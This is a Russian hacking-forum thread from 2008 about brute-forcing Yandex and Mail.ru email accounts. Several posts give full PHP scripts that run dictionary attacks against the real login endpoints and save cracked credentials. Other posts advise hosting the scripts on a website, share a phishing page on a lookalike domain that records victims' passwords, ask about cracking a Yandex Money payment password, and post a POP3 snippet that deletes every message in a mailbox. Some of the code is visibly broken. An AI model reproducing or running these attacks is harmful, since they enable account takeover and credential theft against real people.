Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   Брут Яндекса (https://forum.antichat.xyz/showthread.php?t=64900)

diehard 20.03.2008 18:36
Брут Яндекса
 
Подскажите актуален ли сейчас брут почты @yandex.ru? Какие там ограничения? Банят?

Sated 20.03.2008 19:00
юзай брут от Whack`a

vp$ 20.03.2008 19:07
попробуй сам вручную перебрать 5 паролей, а потом задавай глупые вопросы, через pop3 банят после 300 попыток

Pernat1y 20.03.2008 22:52
да, банят быстро и на долго.
или запасайся пачкой прокси, или забей...

ZET36 21.03.2008 06:52
да актуален

если хочеш заюзай мой скрипт (нужны сокеты)

для брута одного логина несколькими паролями
PHP код:

<?php
$login="логинжертвы"

$passfile "pass.txt"
for ($doscriot=0;$doscriot<=count($contents);$doscriot++) 
{
$passfile "pass.txt";

$handle fopen($passfile,"r");
$contents fread($handle,filesize($passfile));
fclose($handle);
$contents explode("\n",$contents);
$parol=trim($contents[$doscriot]);


$hostname "passport.yandex.ru"
$path "/passport"
$line "";


$fp fsockopen($hostname80$errno$errstr30); 

if (!$fp) echo "$errstr ($errno)<br />\n"
else
{

$data "mode=auth&login=".$login."&passwd=".$parol."&retpath=http://mail.yandex.ru\r\n\r\n"

$headers "POST $path HTTP/1.1\r\n"
$headers .= "Host: $hostname\r\n";
$headers .= "Content-type: application/x-www-form-urlencoded\r\n";
$headers .= "Content-Length: ".strlen($data)."\r\n\r\n";

fwrite($fp$headers.$data); 
while (!feof($fp)) 
{
$line .= fgets($fp1024);
}
fclose($fp);
}

if($line[9]=="3")
{

$zergood 'good.txt';
$somecontent " для логина ".$login." пароль ".$parol;


if (is_writable($zergood)) {


    if (!$udacha fopen($zergood'a')) {
         echo "Не могу открыть файл ($zergood)";
         exit;
    }


    if (fwrite($udacha$somecontent) === FALSE) {
        echo "Не могу произвести запись в файл ($zergood)";
        exit;
    }
    
    echo "Ура! сбручено ($somecontent) и записано в файл ($zergood)";
    
    fclose($udacha);

} else {
    echo "Файл $zergood недоступен для записи";
}

}

}


?>
создаём ещё файлы good.txt куда запишется удачная комбинация

и файл pass.txt со словарём для брута (список паролей)
на все файлы права 777


для брута одним паролем на несколько логинов
PHP код:
<?php
$parol="пароль"

$loginsfile "login.txt"
for ($doscriot=0;$doscriot<=count($contents);$doscriot++) 
{
$loginsfile "login.txt";

$handle fopen($loginsfile,"r");
$contents fread($handle,filesize($loginsfile));
fclose($handle);
$contents explode("\n",$contents);
$loginsss=trim($contents[$doscriot]);


$hostname "passport.yandex.ru"
$path "/passport"
$line "";


$fp fsockopen($hostname80$errno$errstr30); 

if (!$fp) echo "$errstr ($errno)<br />\n"
else
{

$data "mode=auth&login=".$loginsss."&passwd=".$parol."&retpath=http://mail.yandex.ru\r\n\r\n"

$headers "POST $path HTTP/1.1\r\n"
$headers .= "Host: $hostname\r\n";
$headers .= "Content-type: application/x-www-form-urlencoded\r\n";
$headers .= "Content-Length: ".strlen($data)."\r\n\r\n";

fwrite($fp$headers.$data); 
while (!feof($fp)) 
{
$line .= fgets($fp1024);
}
fclose($fp);
}

if($line[9]=="3")
{

$zergood 'good.txt';
$somecontent " у  пароля ".$parol." логин ".$loginsss;


if (is_writable($zergood)) {


    if (!$udacha fopen($zergood'a')) {
         echo "Не могу открыть файл ($zergood)";
         exit;
    }


    if (fwrite($udacha$somecontent) === FALSE) {
        echo "Не могу произвести запись в файл ($zergood)";
        exit;
    }
    
    echo "Ура! сбручено ($somecontent) и записано в файл ($zergood)";
    
    fclose($udacha);

} else {
    echo "Файл $zergood недоступен для записи";
}

}

}


?>

создаём ещё файлы good.txt куда запишется удачные комбинации

и файл login.txt со словарём для брута (список логинов)
на все файлы права 777

URB-VOLK 21.03.2008 09:03
Хороший скрипт)

CRL 22.03.2008 20:04
Хм. У меня в Брутусе скорость от 700pps на яндексе. Правда бан потом идет, но словарик 3000-5000 паролей отлично проходит. Меня кончно немного поражает скорость такая, но пароль все равно находится валидный.

ZET36 23.03.2008 00:42
Цитата:
Сообщение от urb-volk
Хороший скрипт)
а главное что свой трафик тратить ненужно. залил на сайт запустил скрипт выключил комп лёг спать и твой домен всё за тебя сделает. а на завтро смотриш на сайте уже удачные комбинации. помоему рализация брутеров на пхп стоящее занятие

URB-VOLK 23.03.2008 21:30
Надо будит испытать как ты сказал + тебе в репу)

Timati 23.03.2008 21:31
ТС , ДА актуалеен!

Gordiy 25.03.2008 07:16
а мложно тупой вопрос? а скрипт куда вставлять? как я понял страница сохраняется в index.php а вот начало такого <html><body> тут скрипт php и потом идут закрывающие тэги! или не так???

xaklip 02.04.2008 20:13
Цитата:
Сообщение от Gordiy
а мложно тупой вопрос? а скрипт куда вставлять? как я понял страница сохраняется в index.php а вот начало такого <html><body> тут скрипт php и потом идут закрывающие тэги! или не так???
Копируещ весь код из первого поста и сохраняеш в файлик index.php (создай текстовый документ и переименуй txt на php) :)

И без всяких <html><body> и т.п.

NetSter 05.04.2008 01:45
Zet36, респект за скрипт. +)

NetSter 26.04.2008 21:45
нашел у себя старый брютер для яндекса.

http://img293.imageshack.us/img293/9370/scrbf4.th.jpg

скачать можно ЗДЕСЬ
пас 123

_eXe_ 29.04.2008 00:29
А в чем проблема с использованием aet2 в связке с прокси?

puyol 01.05.2008 12:21
если прокси есть конечно актуален

XaCeRoC 03.05.2008 15:20
скажите какой брут юзать если мне надо сбрутить платёжный пароль на _money.yandex.ru

NetSter 15.05.2008 02:00
короч пробовал брютить как советовал ZET36... долго получается. вспомнился старый прикол с яндексом (да и для других почт сервисов были заготовки)
смотрим ЗДЕСЬ
короч вливаем на хост все файлы, кидаем юзверю ссыль на passport.htm и проверяем файлик base.txt (сюда сохраняются введенные логины и пасы)
ИМХО: катит) мне с первого раза удалось заставить юзверя кликнуть ссыль yandex.ЛЮБОЙ-ХОСТ.com/passport.htm , которую послал с мыльника супер-пупер-админ@ya.ru
удачи)
+)
___________________
да, XaCeRoC мож переделать дизайн и под маней)

grandmasterbit 15.05.2008 09:16
NetSter а какой там pass?

NetSter 15.05.2008 11:15
упс )) забыл
пасс 123

sasha008 15.05.2008 11:25
рекомендую брутить яндекс brutus-aet2 очень хорошая прога!

dscan 15.05.2008 12:18
Цитата:
Сообщение от sasha008
рекомендую брутить яндекс brutus-aet2 очень хорошая прога!
уже на протяжении 5 последних лет :)

c0rp$e 27.05.2008 00:23
а приватные брутеры есть у кого нить?

De-visible 27.05.2008 00:41
Цитата:
Сообщение от c0rp$e
а приватные брутеры есть у кого нить?
есть....

c0rp$e 27.05.2008 00:47
Цитата:
Сообщение от De-visible
есть....
продашь?)

Atrakcion 19.06.2008 18:14
NetSter
ничего не остается в base.txt
может там права файлам, котрый на хост заливаешь надо выставлять?

Lucky1954 24.06.2008 23:52
Клевая штука.
Этот скрипт соответственно будет работать с моего домена, значит вариант с прокси здесь отпадает??? Нельзя допустим его направить не напрямую на яндекс а через прокси???

or1 28.12.2008 23:57
Цитата:
Сообщение от xaklip
Копируещ весь код из первого поста и сохраняеш в файлик index.php (создай текстовый документ и переименуй txt на php) :)

И без всяких <html><body> и т.п.
вот не много изменил твой брут




PHP код:
<?php
$login="akula@mail.ru";

$passfile "pass.txt";
for ($doscriot=0;$doscriot<=count($contents);$doscriot++)
{
$passfile "pass.txt";

$handle fopen($passfile,"r");
$contents fread($handle,filesize($passfile));
fclose($handle);
$contents explode("\n",$contents);
$parol=trim($contents[$doscriot]);


$hostname "passport.mail.ru";
$path "/passport";
$line "";


$fp fsockopen("udp://127.0.0.1"21$errno$errstr);
if (!$fp) {
   echo "ERROR: $errno - $errstr<br />\n";
} else {
   fwrite($fp"\n");
   echo fread($fp26);

}
 }
$data "mode=auth&login=".$login."&passwd=".$parol."&retpath=http://www.mail.ru\r\n\r\n";

$headers "POST $path HTTP/1.1\r\n";
$headers .= "Host: $hostname\r\n";
$headers .= "Content-type: application/x-www-form-urlencoded\r\n";
$headers .= "Content-Length: ".strlen($data)."\r\n\r\n";

fwrite($fp$headers.$data);
while (!feof($fp))
{
$line .= fgets($fp1024);
}
fclose($fp);

if($line[9]=="3")
{

$zergood 'good.txt';
$somecontent " для логина ".$login." пароль ".$parol;


if (is_writable($zergood)) {


    if (!$udacha fopen($zergood'a')) {
         echo "Не могу открыть файл ($zergood)";
         exit;
    }


    if (fwrite($udacha$somecontent) === FALSE) {
        echo "Не могу произвести запись в файл ($zergood)";
        exit;
    }

    echo "сбручено ($somecontent) и записано в файл ($zergood)";

    fclose($udacha);

} else {
    echo "Файл $zergood недоступен для записи";
}
}
?>




.................................................. .......................................
вставил это
PHP код:
$fp fsockopen("udp://127.0.0.1"13$errno$errstr);
if (!$fp) {
   echo "ERROR: $errno - $errstr<br />\n";
} else {
   fwrite($fp"\n");
   echo fread($fp26);
   fclose($fp); 
.................................................. ..........................
убрал это

PHP код:
$fp fsockopen($hostname80$errno$errstr30); 

if (!$fp) echo "$errstr ($errno)<br />\n"
else

.................................................. ............................
вот хотел спросить строку если тут изменить udp://127.0.0.1

or1 29.12.2008 01:36
PHP код:
<?php 
// So, username is your POP3 $username, password is your $password

    $cmd = array();
    $cmd[]  = "USER $username\r\n";
    $cmd[]  = "PASS $password\r\n";
    $cmd[]  = "STAT\r\n";
    $cmd[]  = "QUIT\r\n";

// Server is your POP3 server, ie pop3.server.com
// Port is the port number ( should be 110 )

    $port 110;

    $fp  fsockopen($server$port);
    if(!$fp)
    {
        print("Error connecting to server $server");
    }
    else
    {
        $ret fgets($fp1024);
        foreach($cmd as $ret)
        {
            fputs($fp,$ret);
            $line fgets($fp1024);
            print($line."<br>");
            if($ret=="STAT\r\n")
            {
                $fields explode(" ",$line);
                $num_mails $fields[1];
                for($i=1;$i<=$num_mails;$i++)
                {
                fputs($fp,"DELE $i\r\n");
                $line fgets($fp1024);
                }
            }
        }
    }
?>
так наверно будет красивей,,,,
а дальше можете сами вписатть pass.txt and good.txt

morgon 29.12.2008 11:21
Что за приватные брутеры?

BlackDraG 29.12.2008 11:22
Цитата:
Сообщение от morgon
Что за приватные брутеры?
Платные или скрытые для простых юзеров )
ps:они не для тебя :D

CRL 29.12.2008 16:32
Цитата:
Сообщение от BlackDraG
Платные или скрытые для простых юзеров )
ps:они не для тебя :D

Нуу я бы так не сказал, просто иногда проблема не в том что они платные, а в том что не знаешь кому платить.

sa~ 29.12.2008 20:46
Цитата:
Сообщение от BlackDraG
Платные или скрытые для простых юзеров )
ps:они не для тебя :D
может для негО? откуда знаешь?
Цитата:
Сообщение от CRL
Нуу я бы так не сказал, просто иногда проблема не в том что они платные, а в том что не знаешь кому платить.
^^

CRL 29.12.2008 20:57
sa~ да я бы купил, если работает нормально)

BlackDraG 29.12.2008 20:58
Цитата:
Сообщение от sa~
может для негО? откуда знаешь?
Раз спрашивает чё ето такое то точно не для него ;)


Время: 17:31